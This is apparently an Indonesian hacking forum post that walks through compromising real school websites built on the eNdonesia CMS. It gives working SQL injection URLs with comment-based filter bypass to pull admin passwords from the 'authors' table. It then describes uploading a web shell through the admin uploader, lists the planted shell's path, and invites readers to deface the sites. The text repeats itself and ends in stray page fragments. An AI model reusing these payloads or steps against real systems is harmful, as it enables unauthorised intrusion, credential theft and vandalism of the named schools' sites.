Bumbu:
- Exploit web apps (Exploit CMS Endonesia)
link exploit
http://www.exploit-db.com/exploits/15006/
- web Shell+tamper data
- Cheat MySQL
ane kutip dikit exploit nya
biar lebih efektif dan hemat waktu
cheat sql buat ngakalin nya, union+all+select di ubah bentuk nya ke /*union*/+all+/*select*/
maka di tampilkan angka kolom yang vulner yaitu angka 2. gak usah extract information_Schema langsung masukin nama kolom dari keterang exploit nya di atas.
http://sdp-padang.sch.id/admin.php
untuk cms ini uploader nya ada di mod_informasi
jadi ente upload make tamper data dah banyak thread nya di sini, terus path shell nya
site/mod/informasi/foto/nama_shell ente.php
http://sdp-padang.sch.id/mod/informasi/foto/42.php
http://sdp-padang.sch.id/admin/warning.txt
"Apache
Linux us3.clientdomainmanager.org 2.6.18-028stab070.14 #1 SMP Thu Nov 18 16:04:02 MSK 2010 x86_64 "
bagi yang pengen deface ya silahkan di deface hidden deface, kalo full index kasihan juga web sekolahan.
note:
- ane mepes target ini tujuan nya hanya untuk pembelajaran.
- nyari domain luar gak ada soalnya ni cms dari indo
- dah reporting bug tapi gak di gubrish
- kalo gak berkenan silahkan di closed atau hapus ajah
Credit: "ohara"
- Exploit web apps (Exploit CMS Endonesia)
link exploit
http://www.exploit-db.com/exploits/15006/
- web Shell+tamper data
- Cheat MySQL
ane kutip dikit exploit nya
dari keterangan di atas, kita dapat info kalo cms ini default table_user nya bernama "authors". di dalam tabel authors terdapat 3 kolom yaitu "aid,name,pwd". jadi ketika kita nginject target, tinggal masukin aja nama-nama kolom tersebut pada angka kolom yang vulner, tanpa mengextract database information_schema dari mysql nya.Code:
============================================================================================
[Vulnerability File]
http://localhost/[eNdonesia 8.4]/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i]
[ DEMO ]
http://www.site.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--
============================================================================================
biar lebih efektif dan hemat waktu
http://smp24-padang.sch.id/mod.php?mod=diskusi&op=viewcat&cid=-2+union+all+select+1,2,3--
yang ditampilkan malahcheat sql buat ngakalin nya, union+all+select di ubah bentuk nya ke /*union*/+all+/*select*/
http://sdp-padang.sch.id/mod.php?mod=diskusi&op=viewcat&cid=-2+/*!union*/+all+/*!select*/+1,2,3--
maka di tampilkan angka kolom yang vulner yaitu angka 2. gak usah extract information_Schema langsung masukin nama kolom dari keterang exploit nya di atas.
masuk ke halaman admin nya dan mari upload shell ente.http://sdp-padang.sch.id/mod.php?mod=diskusi&op=viewcat&cid=-2+/*!union*/+all+/*!select*/+1,pwd,3+from+authors--
http://sdp-padang.sch.id/admin.php
untuk cms ini uploader nya ada di mod_informasi
jadi ente upload make tamper data dah banyak thread nya di sini, terus path shell nya
site/mod/informasi/foto/nama_shell ente.php
http://sdp-padang.sch.id/mod/informasi/foto/42.php
http://sdp-padang.sch.id/admin/warning.txt
"Apache
Linux us3.clientdomainmanager.org 2.6.18-028stab070.14 #1 SMP Thu Nov 18 16:04:02 MSK 2010 x86_64 "
bagi yang pengen deface ya silahkan di deface hidden deface, kalo full index kasihan juga web sekolahan.
note:
- ane mepes target ini tujuan nya hanya untuk pembelajaran.
- nyari domain luar gak ada soalnya ni cms dari indo
- dah reporting bug tapi gak di gubrish
- kalo gak berkenan silahkan di closed atau hapus ajah
Credit: "ohara"
Conversion Conversion Emoticon Emoticon